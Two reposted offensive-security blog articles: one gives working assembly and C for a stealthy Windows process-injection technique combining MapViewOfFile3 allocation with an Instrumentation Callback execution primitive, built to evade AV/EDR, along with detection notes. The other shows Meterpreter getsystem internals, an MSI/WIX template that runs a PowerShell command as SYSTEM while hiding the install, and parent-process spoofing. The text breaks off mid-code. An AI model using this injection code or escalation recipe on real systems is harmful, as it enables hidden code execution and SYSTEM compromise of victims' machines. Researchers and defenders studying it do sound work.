Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection

Original text by splinter_code

Process injection is a technique for hiding code behind benign and/or system processes. Malware usually uses it to stay stealthy while performing malicious operations on the system. AV/EDR solutions are aware of this technique and create detection patterns to identify and kill this "class" of attacks.

Nowadays detection is achieved in multiple ways. The most common is userland hooking. Most of the time, this is done by injecting a hooking-engine DLL directly from the kernel every time a new process is created.

While it has been proven that this kind of detection can be bypassed in multiple ways (by remapping DLLs from disk at runtime or by using direct system calls), there are other effective ways to track injection behaviors.
For example, Sysmon provides a way to track remote thread creation directly from ring 0, which avoids all the problems of monitoring a process from the same ring level as the process itself.

There is also the Event Tracing for Windows (ETW) kernel-mode API, which adds event tracing to kernel-mode drivers: you can register for specific events (for the process injection scenario, syscalls are of interest) and receive notifications from the kernel directly in ring 0. In the latest Windows versions the kernel has been instrumented with new sensors designed to trace user APC code injection initiated by kernel code, along with other events that track process injection. There is no public documentation about this, but here you can find an interesting article with some of the events you can register for.

With that in mind, I wanted to explore whether there are other patterns that can be used to perform process injection (ideally not well documented nor already known) and check whether they can bypass some AVs/EDRs. The aim is not to criticize the detection currently in place in AVs/EDRs, but to give detailed internals on how it works in order to ease (by making known what is unknown) the development of effective detection.

So before I jump into the technical deep dive, here is a TL;DR of what you are going to read (if you are interested):

I’m going to release and detail a stealthy process injection technique that combines two functions to achieve an allocation primitive (which I already described some time ago), CreateFileMapping() and MapViewOfFile2() (well, I have made some updates to use a stealthier version called MapViewOfFile3()), and chains a very powerful execution primitive through the call NtSetInformationProcess().
The last function I mentioned can be used to set an Instrumentation Callback in an arbitrary process. From the attacker’s perspective this function can be abused to do a "jmp [0xYourAddress]" directly from the kernel without creating a remote thread or an APC, really stealthy!
It has a drawback: it expects a callback with a specific behavior that you must follow if you don’t want to mess up or crash the target process, and this is what I will [try to] explain in this post.


While the functions that achieve the allocation primitive on the target process have already been described, the main focus of this section is to detail all the steps needed to comply with the behavior expected of the callback used with NtSetInformationProcess().

The starting point will be this post and this presentation where they described this technique for hooking purposes.

The core of this technique is not the syscall NtSetInformationProcess() but the Instrumentation Callback.
The Instrumentation Callback is a field in the KPROCESS structure and is set to NULL by default for every process.

How does it work?

"Each time the kernel encounters a situation in which it returns to user level code. It checks the InstrumentationCallback member of the current KPROCESS structure under which the processor executes. If it is not NULL and assuming it points to valid memory, the kernel will swap out the RIP on the trap frame and exchange it for the value contained at InstrumentationCallback." (taken from here)

There are many situations in which there is a transition from kernel to userland code. So let’s analyze the function in charge of swapping RIP.
Reversing ntoskrnl.exe, I found the function KiSetupForInstrumentationReturn(), which looks promising:

What it does is simply check the InstrumentationCallback field and, if it’s not NULL, save the original RIP (the address at which userland execution should resume) and then change the RIP value in the KTRAP_FRAME to the address contained in the InstrumentationCallback field.
The KTRAP_FRAME holds the state that was saved when the thread entered the kernel. This structure is used to restore that state when the kernel finishes its job and resumes userland execution.

In other words, setting the Instrumentation Callback can trigger your code any time this transition occurs.
But… in the beginning I had 2 points to clarify in order to understand whether the callback could be abused as an execution primitive for process injection:

  1. How often does this transition happen? Ideally the shellcode shouldn’t take ages to run, so we need these transitions to happen often in processes (and in this case in the target process).
  2. The InstrumentationCallback is a field of the kernel structure KPROCESS, so we can’t set it directly from a userland process. Is there a way to set it from a userland process? If yes, do we need any particular privilege or precondition?

To clarify the first point, I looked at all cross references to the function KiSetupForInstrumentationReturn():

As shown in the above screenshot, there are some places where the instrumentation callback triggers. Those triggers happen when the process raises an exception (KiDispatchException) or when an APC gets scheduled in the process (KiInitializeUserApc). Although those triggers are valid (and useful from a hooking perspective), they do not fire often enough for our purpose.

But… what about the transition from kernel to userland that happens when a syscall returns? Does the callback get triggered before the sysret? It is certainly not triggered through the function KiSetupForInstrumentationReturn() shown above, but maybe there is some inline code that does this job.

So let’s investigate KiSystemCall64(), the system service dispatcher function for x64 systems (in other words, the function in the kernel that is called after the syscall instruction).

A label in this function caught my attention: KiSystemServiceExit. This is one of the last operations done before the sysret instruction, where all the data is restored from the KTRAP_FRAME.

Disassembling this function, I found a really interesting piece of code:

0: kd> uf nt!KiSystemCall64
fffff803`7d9d3d88 488945b0 mov qword ptr [rbp-50h],rax
fffff803`7d9d3d8c e8dfeafeff call nt!KiRestoreDebugRegisterState (fffff803`7d9c2870)
fffff803`7d9d3d91 65488b042588010000 mov rax,qword ptr gs:[188h] ; Get current thread
fffff803`7d9d3d9a 488b80b8000000 mov rax,qword ptr [rax+0B8h] ; Thread->Process
fffff803`7d9d3da1 488b80d0020000 mov rax,qword ptr [rax+2D0h] ; Process->Pcb.InstrumentationCallback
fffff803`7d9d3da8 480bc0 or rax,rax
fffff803`7d9d3dab 7418 je nt!KiSystemServiceExit+0x1a5 (fffff803`7d9d3dc5) ; Jump to SkipCallback code
nt!KiSystemServiceExit+0x18d: ; callback present code
fffff803`7d9d3dad 6683bdf000000033 cmp word ptr [rbp+0F0h],33h ; SegCs
fffff803`7d9d3db5 750e jne nt!KiSystemServiceExit+0x1a5 (fffff803`7d9d3dc5) ; Jump to SkipCallback code
fffff803`7d9d3db7 4c8b95e8000000 mov r10,qword ptr [rbp+0E8h] ; Saves old Rip in R10 -> R10 = ReturnAddressLocal
fffff803`7d9d3dbe 488985e8000000 mov qword ptr [rbp+0E8h],rax ; ReturnAddressLocal = InstrumentationCallback
nt!KiSystemServiceExit+0x1a5: ; SkipCallback code
fffff803`7d9d3dc5 488b45b0 mov rax,qword ptr [rbp-50h]
fffff803`7d9d3dc9 488945b0 mov qword ptr [rbp-50h],rax

The variable ReturnAddressLocal is a local variable initialized to the real userland return address (the address right after the syscall instruction in the userland process, which is usually a ret instruction). This address is taken from the 3rd argument of the KiSystemCall64() function. This piece of code checks whether the Instrumentation Callback is set; if so, the real return address is saved in R10 and the callback address is stored in ReturnAddressLocal. ReturnAddressLocal is then assigned to KTRAP_FRAME->RIP, so when the frame is restored, userland execution is redirected to the callback address.
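The check on the system-call exit path can be modeled in a few lines of plain C, which may help when reasoning about what a callback sees on entry. This is only a user-mode sketch: `trap_frame_model`, `process_model` and `apply_instrumentation_callback` are hypothetical names, the structs are not the real kernel layouts, and the 0x33 selector is simply the value compared against SegCs in the disassembly above.

```c
#include <stdint.h>

/* Hypothetical, heavily simplified stand-ins for KTRAP_FRAME and KPROCESS. */
typedef struct {
    uint64_t rip;     /* user-mode address execution will resume at      */
    uint64_t r10;     /* receives the original RIP when redirected       */
    uint16_t seg_cs;  /* code segment selector of the interrupted code   */
} trap_frame_model;

typedef struct {
    uint64_t instrumentation_callback; /* 0 means "not set" */
} process_model;

/*
 * Models the logic shown in the disassembly: when a callback is set and the
 * thread is returning to 64-bit user code (CS == 0x33), the original return
 * address is kept in R10 and RIP is replaced with the callback address.
 * Returns 1 if the return address was swapped, 0 otherwise.
 */
int apply_instrumentation_callback(const process_model *proc,
                                   trap_frame_model *tf)
{
    if (proc->instrumentation_callback == 0)
        return 0;                 /* no callback registered: normal return */
    if (tf->seg_cs != 0x33)
        return 0;                 /* selector check failed: skip callback  */
    tf->r10 = tf->rip;            /* callback finds the real return here   */
    tf->rip = proc->instrumentation_callback;
    return 1;
}
```

The model makes the contract visible: whatever runs at the callback address receives the real return address in R10 and nothing else, so it is responsible for eventually jumping back to it.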

Great! This is a perfect trigger for our process injection 😀

So let’s proceed to the next point I wanted to clarify: how do we set this field from a userland process? This can be achieved by calling NtSetInformationProcess() using ProcessInstrumentationCallback (40) as the PROCESS_INFORMATION_CLASS parameter and the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION with some required values. (credits to @aionescu)

There are 2 prerequisites to meet:

  1. A process handle with the PROCESS_SET_INFORMATION access is needed;
  2. If a remote process is the target, the SeDebugPrivilege is required. No privileges required if the current process handle is used.

Let’s do something more practical and see how this works in a debugging session. I created a .c source that sets its own Instrumentation Callback to a callback that just does "jmp R10", and then calls an arbitrary syscall (I used NtDelayExecution() in this example) that triggers our callback.

As you can see in the above debugging session, userland execution after the syscall instruction isn’t resumed at the next instruction as usual (the ret instruction); instead it jumps to the callback function which, in this case, is just a jump to r10.

Ok, now we know we are able to hijack the execution flow of every syscall of the target process!

But… but… We can’t just allocate our shellcode and run it from the callback address, because this would blow up the target process for different reasons (recursion, stack corruption, etc…). Effective process injection shouldn’t crash the target process. So, what are all the potential causes of a crash that we should take into consideration?

  1. The callback code must be in charge of saving and restoring RAX (which contains the return value of the syscall) and R10 (needed to restore the execution);
  2. The callback code must be in charge of saving and restoring all the non-volatile registers and the shadow stack space;
  3. The shellcode shouldn’t run every time a syscall returns to userland, but just once;
  4. The callback code must ensure that the shellcode execution doesn’t create lock conditions while returning the result of the syscall to the caller. So we need to run the shellcode in an async way. This can be achieved by running the shellcode in a local thread.
  5. If the callback code itself makes another syscall, it should avoid recursion.
  6. Once the shellcode is executed successfully, the callback code will be still placed on the target process. So the callback code must have a way to be turned off.

Let’s write the callback code that manages all the above points, it’s assembly time!

As a starting point I used this public POC available here, which handles the first 2 points mentioned above. I will use fasm for assembling and emitting raw shellcode. There is no particular technical reason I preferred it over nasm; I found it cool that it’s entirely written in assembly and can be used to assemble itself. I didn’t use masm because, as far as I know, there is no way to make it emit raw assembled code instead of object files (which are in the COFF format).

The final callback asm code is:

;C:\fasm\fasm.exe callback.asm callback.bin
;python bin2cbuffer.py callback.bin callback
mov rdx, 0x7fffffffffff ; address of the global variable flag to check thread creation
;check if thread never run
cmp byte [rdx], 0
je callback_start
;avoid recursions
jmp restore_execution
;here starts the callback part that runs shellcode, this should run just 1st time
push r10 ; contains old rip to restore execution
push rax ; syscall return value
; why pushing these registers? -> https://docs.microsoft.com/en-us/cpp/build/x64-calling-convention?view=vs-2019#callercallee-saved-registers
push rbx
push rbp
push rdi
push rsi
push rsp
push r12
push r13
push r14
push r15
;shadow space should be 32 bytes + additional function parameters. Must be 32 also if function parameters are less than 4
sub rsp, 32
lea rcx, [shellcode_placeholder] ; address of the shellcode to run
call DisposableHook
;restore stack shadow space
add rsp, 32
;restore nonvolatile registers
pop r15
pop r14
pop r13
pop r12
pop rsp
pop rsi
pop rdi
pop rbp
pop rbx
;restore the return value
pop rax
;restore old rip
pop r10
jmp r10
;source DisposableHook.c -> DisposableHook.msvc.asm
status$ = 96
tHandle$ = 104
objAttr$ = 112
shellcodeAddr$ = 176
threadCreated$ = 184
; 37 : void DisposableHook(LPVOID shellcodeAddr, char *threadCreated) {
mov QWORD [rsp+16], rdx
mov QWORD [rsp+8], rcx
push rdi
sub rsp, 160 ; 000000a0H
; 38 : NTSTATUS status;
; 39 : HANDLE tHandle = NULL;
mov QWORD [rsp+tHandle$], 0
; 40 : OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr) };
mov DWORD [rsp+objAttr$], 48 ; 00000030H
lea rax, QWORD [rsp+objAttr$+8]
mov rdi, rax
xor eax, eax
mov ecx, 40 ; 00000028H
rep stosb
; 43 : *threadCreated = 1; //avoid recursion
mov rax, QWORD [rsp+threadCreated$]
mov BYTE [rax], 1
; 44 : status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, &objAttr, (HANDLE)-1, (LPVOID)shellcodeAddr, NULL, FALSE, 0, 0, 0, NULL);
mov QWORD [rsp+80], 0
mov DWORD [rsp+72], 0
mov DWORD [rsp+64], 0
mov DWORD [rsp+56], 0
mov DWORD [rsp+48], 0
mov QWORD [rsp+40], 0
mov rax, QWORD [rsp+shellcodeAddr$]
mov QWORD [rsp+32], rax
mov r9, -1
lea r8, QWORD [rsp+objAttr$]
mov edx, 536870912 ; 20000000H
lea rcx, QWORD [rsp+tHandle$]
call NtCreateThreadEx
mov DWORD [rsp+status$], eax
; 46 : if (status != 0)
cmp DWORD [rsp+status$], 0
je LN2_Disposable
; 47 : *threadCreated = 0; //thread creation failed, reset flag
mov rax, QWORD [rsp+threadCreated$]
mov BYTE [rax], 0
; 53 : }
add rsp, 160 ; 000000a0H
pop rdi
ret 0
mov rax, [gs:60h]
cmp dword [rax+120h], 10240
je build_10240
cmp dword [rax+120h], 10586
je build_10586
cmp dword [rax+120h], 14393
je build_14393
cmp dword [rax+120h], 15063
je build_15063
cmp dword [rax+120h], 16299
je build_16299
cmp dword [rax+120h], 17134
je build_17134
cmp dword [rax+120h], 17763
je build_17763
cmp dword [rax+120h], 18362
je build_18362
cmp dword [rax+120h], 18363
je build_18363
jg build_preview
jmp syscall_unknown
build_10240: ; Windows 10.0.10240 (1507)
mov eax, 00b3h
jmp do_syscall
build_10586: ; Windows 10.0.10586 (1511)
mov eax, 00b4h
jmp do_syscall
build_14393: ; Windows 10.0.14393 (1607)
mov eax, 00b6h
jmp do_syscall
build_15063: ; Windows 10.0.15063 (1703)
mov eax, 00b9h
jmp do_syscall
build_16299: ; Windows 10.0.16299 (1709)
mov eax, 00bah
jmp do_syscall
build_17134: ; Windows 10.0.17134 (1803)
mov eax, 00bbh
jmp do_syscall
build_17763: ; Windows 10.0.17763 (1809)
mov eax, 00bch
jmp do_syscall
build_18362: ; Windows 10.0.18362 (1903)
mov eax, 00bdh
jmp do_syscall
build_18363: ; Windows 10.0.18363 (1909)
mov eax, 00bdh
jmp do_syscall
build_preview: ; Windows Preview
mov eax, 00c1h
jmp do_syscall
mov eax, -1
mov r10, rcx
;from here will be appended the shellcode

Note: the NtCreateThreadEx function is a slightly modified version taken from this nice repo -> SysWhispers

Very briefly, the flag for callback activation is initialized to 0 (turned on) and the address that holds this value is moved into rdx. If the callback is turned on, it calls the DisposableHook function. This is, as the name suggests, a hook that runs just once and then goes away (well, not always: it persists if the thread creation fails). I wrote the DisposableHook function with the help of Visual Studio’s asm generation, starting from a .c source file:

void DisposableHook(LPVOID shellcodeAddr, char *threadCreated) {
NTSTATUS status;
HANDLE tHandle = NULL;
OBJECT_ATTRIBUTES objAttr = { sizeof(objAttr) };
*threadCreated = 1; //avoid recursion
status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, &objAttr, (HANDLE)-1, (LPVOID)shellcodeAddr, NULL, FALSE, 0, 0, 0, NULL);
if (status != 0)
*threadCreated = 0; //thread creation failed, reset flag

This function takes as input the address of the shellcode (in our case always the address of the "shellcode_placeholder" label, moved into rcx) and the address of the flag that says whether the shellcode should still be run (moved into rdx at the beginning of the callback code).
It runs the shellcode in a thread and turns off the callback code by changing the global variable passed as the "threadCreated" argument.
When the callback is turned off, it simply jumps to r10.
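The flag protocol described above (check the flag, set it before attempting the work, clear it again if the attempt fails) is a generic run-once guard and can be studied in isolation. The following is a minimal user-mode model of that state machine only: `one_shot_dispatch`, `launch_fn`, `launch_ok` and `launch_fail` are hypothetical names introduced for illustration, and the launchers are harmless stubs that just count how often they were invoked.

```c
#include <stdbool.h>

/* Hypothetical work launcher: returns true when the work was started. */
typedef bool (*launch_fn)(void *ctx);

/*
 * Run-once guard mirroring the flag handling in the text:
 *   flag == 0  -> guard is armed, try to launch the work
 *   flag != 0  -> work already launched (or launch in progress), do nothing
 * The flag is set BEFORE launching so that any nested invocation triggered
 * by the launch itself sees it and falls through. On failure the flag is
 * cleared so that a later invocation can retry.
 * Returns true only for the invocation that actually launched the work.
 */
bool one_shot_dispatch(volatile char *flag, launch_fn launch, void *ctx)
{
    if (*flag != 0)
        return false;
    *flag = 1;
    if (!launch(ctx)) {
        *flag = 0;
        return false;
    }
    return true;
}

/* Demo launchers: ctx points to an int that counts invocations. */
bool launch_ok(void *ctx)   { ++*(int *)ctx; return true;  }
bool launch_fail(void *ctx) { ++*(int *)ctx; return false; }
```

One thing the model makes easy to see is that the check and the store are not atomic: two threads returning from syscalls at the same moment could both observe 0 and both launch. Whether that matters depends on the payload, but it is a property of this flag scheme worth keeping in mind when analyzing samples that use it.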

Now that we have a callback that won’t mess up the target process, we need to prepare memory for its execution in the target process. We need two allocations in the target process. The first is 1 byte of RW memory that will be the flag to activate/deactivate the callback function. The second is a chunk of memory that will contain the callback code + the shellcode (so RX memory).

This is where the Mapping Injection technique comes into play to allocate remote memory. The only variation I applied is using the function MapViewOfFile3() instead of MapViewOfFile2(). MapViewOfFile3() is exported from kernelbase.dll and is stealthier because it internally calls NtMapViewOfSectionEx(), which the kernel has exposed since Windows 10 build 17134 (version 1803). As it is "quite" recent, many hooking engines simply forgot about it and only hook the classic NtMapViewOfSection(), which this technique avoids. For this reason this call will most probably go undetected by many hooking engines.

The function in charge of the mapping injection allocation is called MappingInjectionAlloc() with the following code:

LPVOID MappingInjectionAlloc(HANDLE hProc, char* buffer, SIZE_T bufferSize, DWORD protectionType) {
pMapViewOfFile3 MapViewOfFile3 = (pMapViewOfFile3)GetProcAddress(GetModuleHandleW(L"kernelbase.dll"), "MapViewOfFile3");
if (hFileMap == NULL)
printf("CreateFileMapping failed with error: %d\n", GetLastError());
LPVOID lpMapAddress = MapViewOfFile3(hFileMap, GetCurrentProcess(), NULL, 0, 0, 0, PAGE_READWRITE, NULL, 0);
if (lpMapAddress == NULL)
printf("MapViewOfFile failed with error: %d\n", GetLastError());
memcpy((PVOID)lpMapAddress, buffer, bufferSize);
LPVOID lpMapAddressRemote = MapViewOfFile3(hFileMap, hProc, NULL, 0, 0, 0, protectionType, NULL, 0);
if (lpMapAddressRemote == NULL)
printf("\nMapViewOfFile3 failed with error: %d\n", GetLastError());
return lpMapAddressRemote;

Now it’s time to write the injector that will perform the following steps:

  1. Enable the SeDebugPrivilege for the current process (needed for setting the Instrumentation Callback of a remote process);
  2. Find the PID of the target process (i.e. explorer.exe);
  3. Open a handle to that process with the accesses PROCESS_VM_OPERATION (required for MapViewOfFile3) and PROCESS_SET_INFORMATION (required for NtSetInformationProcess)
  4. Allocate 1 byte RW memory (initialized to 0) in the target process that will be used as the flag for activation/deactivation of the callback. This is done through the function MappingInjectionAlloc() that will return the allocation address used in the next step;
  5. Create the final callback by replacing in the callback code the RDX address of the previously allocated flag. Append the required shellcode at the end of the callback code and remotely allocate RX memory in the target process to hold all the final callback code. This is done  through the function MappingInjectionAlloc() that will return the allocation address used in the callback field in the next step;
  6. Assign the address of the remote final callback in the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;
  7. Call NtSetInformationProcess() with the handle to the target process and with the structure PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION that contains the final callback address in the remote process;
  8. Enjoy your shellcode execution 😀

The shellcode execution is triggered really fast (almost instantly) if you choose a running process that is doing some jobs (i.e. explorer, winlogon, lsass…) because the callback will try to run the shellcode for every syscall execution.

In the end, the chain of API calls will be:

OpenProcess() -> (CreateFileMapping() -> MapViewOfFile3() [current process] -> MapViewOfFile3() [target process]) x 2 times -> NtSetInformationProcess()
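From a defender’s point of view, the first link of this chain already carries a signal: the handle is opened on another process with both PROCESS_VM_OPERATION and PROCESS_SET_INFORMATION. Below is a minimal sketch of a heuristic over handle-open telemetry. The `handle_open_event` record and its field names are hypothetical (they stand for whatever your sensor reports), while the two mask values mirror the constants defined in winnt.h. Legitimate software also requests these rights, so this is a triage hint rather than a verdict.

```c
#include <stdint.h>
#include <stdbool.h>

/* Same values as PROCESS_VM_OPERATION / PROCESS_SET_INFORMATION in winnt.h;
 * prefixed so the sketch also compiles where the Windows headers are present. */
#define ACCESS_PROCESS_VM_OPERATION    0x0008u
#define ACCESS_PROCESS_SET_INFORMATION 0x0200u

/* Hypothetical telemetry record for a process-handle open. */
typedef struct {
    uint32_t source_pid;      /* process requesting the handle */
    uint32_t target_pid;      /* process the handle refers to  */
    uint32_t desired_access;  /* requested access mask         */
} handle_open_event;

/*
 * Flags cross-process handle opens that request BOTH rights needed by the
 * chain described in the text. Opens on the caller's own process are ignored.
 */
bool is_suspicious_handle_open(const handle_open_event *ev)
{
    const uint32_t wanted =
        ACCESS_PROCESS_VM_OPERATION | ACCESS_PROCESS_SET_INFORMATION;

    if (ev->source_pid == ev->target_pid)
        return false;
    return (ev->desired_access & wanted) == wanted;
}
```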

Let’s test it and spawn a MessageBox in explorer.exe:

You can find the POC code here.


After the shellcode executes, this technique leaves some traces behind. The "InstrumentationCallback" field in the KPROCESS structure of the target process will still point to the memory address of the callback function.

By default, processes have the InstrumentationCallback set to NULL. So this could be used to detect whether a process has been injected using this technique.

Assuming you have a memory dump of the machine, you can check the KPROCESS of all processes; if the field "InstrumentationCallback" is not NULL, you can follow that address and you will probably find the callback code and also the shellcode allocated at the bottom.
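The triage step itself is a simple filter once the field has been extracted for each process. The sketch below assumes that some memory-forensics tooling has already produced one record per process; the `process_record` layout and the function name are hypothetical and say nothing about how the KPROCESS field is actually located in a dump.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical per-process record produced by memory-forensics tooling. */
typedef struct {
    uint32_t    pid;
    const char *image_name;
    uint64_t    instrumentation_callback; /* value read from KPROCESS, 0 if NULL */
} process_record;

/*
 * Collects pointers to every record whose InstrumentationCallback is set.
 * At most out_cap pointers are stored in out; the return value is the total
 * number of matches, which may exceed out_cap.
 */
size_t find_instrumented(const process_record *procs, size_t count,
                         const process_record **out, size_t out_cap)
{
    size_t found = 0;

    for (size_t i = 0; i < count; ++i) {
        if (procs[i].instrumentation_callback != 0) {
            if (found < out_cap)
                out[found] = &procs[i];
            ++found;
        }
    }
    return found;
}
```

Each hit is a starting point for the manual follow-up described above: dump the memory at the callback address and look at what sits behind it.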

Here is an example of finding evidence after running the POC targeting the process explorer.exe:

You may be wondering: what if you set the instrumentation callback back to NULL to avoid detection? Well, this could be possible but it won’t be detailed in this post. What I can say is that it’s not as easy as it seems; you can dare to try 😀

That being said, this is certainly not a silver bullet for every detection, but it could be used as a generic way to detect the injection, or at least attackers that use this POC.


The Instrumentation Callback feature is really powerful for both hooking and code execution. The concept of the "DisposableHook" can be used to turn any hooking mechanism into a code execution primitive for process injection without messing up the target process.

This technique would bypass a plethora of AVs/EDRs because it uses a quite uncommon way to perform process injection.
It uses neither the prehistoric and classic VirtualAllocEx() and WriteProcessMemory() for the allocation primitive nor the classic CreateRemoteThread() for the execution primitive.

It uses a combination of API calls to allocate remote memory through a recently added function for managing section objects. Moreover, it doesn’t create any remote thread or APC thanks to the powerful execution primitive provided by the Instrumentation Callback.

As seen, it still leaves some traces that can be inspected to detect the injection.

It has some drawbacks: it requires the debug privilege, and it works only on recent Windows versions and only on x64.

Prevention could be achieved using kernel ETW subscriptions, which would make it possible to detect the remote memory allocation through MapViewOfFile3() (well, technically NtMapViewOfSectionEx()) even if direct syscalls are used.

AV/EDR solutions that use kernel ETW subscriptions to monitor syscalls (those allowed by ETW) can make a difference in preventing this technique and many other malicious behaviors, because those notifications are generated at a more privileged ring level than the process itself.


Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s "getsystem"

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing, we first need to understand a little about how a process can impersonate another user. Impersonation is a useful method provided by Windows in which a process can impersonate another user’s security context. For example, if a process acting as an FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and allow Windows to enforce security.

To facilitate impersonation, Windows exposes numerous native APIs to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • ReturnToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to "victim" connects and writes to a named pipe belonging to "attacker", the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to "victim", and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:


This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.
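The first step of this flow leaves an observable artifact: a newly created service whose only job is to talk to a named pipe. A common defensive heuristic is to inspect the command line of newly installed services for a literal pipe path. The sketch below assumes the pipe path appears verbatim in the service command line (the text above only says that the service connects to a pipe, so treat that as an assumption), and `service_command_targets_pipe` and `contains_ci` are hypothetical helper names.

```c
#include <stdbool.h>
#include <string.h>
#include <ctype.h>

/* Case-insensitive substring search over plain C strings. */
static bool contains_ci(const char *haystack, const char *needle)
{
    size_t n = strlen(needle);

    if (n == 0)
        return true;
    for (; *haystack != '\0'; ++haystack) {
        size_t i = 0;
        while (i < n && haystack[i] != '\0' &&
               tolower((unsigned char)haystack[i]) ==
               tolower((unsigned char)needle[i]))
            ++i;
        if (i == n)
            return true;
    }
    return false;
}

/*
 * Returns true when a service command line references the local named-pipe
 * namespace (\\.\pipe\), which is unusual for a legitimate service binary path.
 */
bool service_command_targets_pipe(const char *command_line)
{
    return contains_ci(command_line, "\\\\.\\pipe\\");
}
```

For example, a command line such as `cmd.exe /c echo abc > \\.\pipe\abc` is flagged, while an ordinary `svchost.exe -k netsvcs` entry is not.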

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester (@_xpn_):

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research I was doing into the Duqu 2.0 malware, in which this APT actor was delivering malware packaged within an MSI file.

It turns out that a benefit of launching your code via an MSI is the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:


This documents a simple way in which a MSI can be used to launch processes as SYSTEM, by providing a custom action with an Impersonate attribute set to false.

When crafted, our WIX file will look like this:

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
<File Id="ApplicationFile1" Source="example.exe"/>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
invalid vbs to fail install
<Custom Action="SystemShell" After="InstallInitialize"></Custom>
<Custom Action="FailInstall" Before="InstallFiles"></Custom>

A lot of this is just boilerplate to generate a MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommand attribute for long Powershell commands).

Another useful trick is to ensure that the install fails after our command is executed, which stops the installer from adding a new entry to "Add or Remove Programs". This is done here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into an MSI, we save the above contents as a file called "msigen.wix" and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:



This method of becoming SYSTEM was actually revealed to me via James Forshaw’s walkthrough of how to become "Trusted Installer".

Again, if you listen to my ramblings on Twitter, I recently mentioned this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:


So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.
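Because the declared parent is chosen by the caller, it can differ from the process that actually issued the creation request, and that mismatch is what defenders usually look for. The sketch below assumes a telemetry source that reports both values for each process-creation event; the `process_create_event` record and its field names are hypothetical. Some legitimate system components also reassign parents, so a hit is a lead to investigate, not proof of abuse.

```c
#include <stdint.h>
#include <stdbool.h>

/* Hypothetical process-creation record that carries both identities. */
typedef struct {
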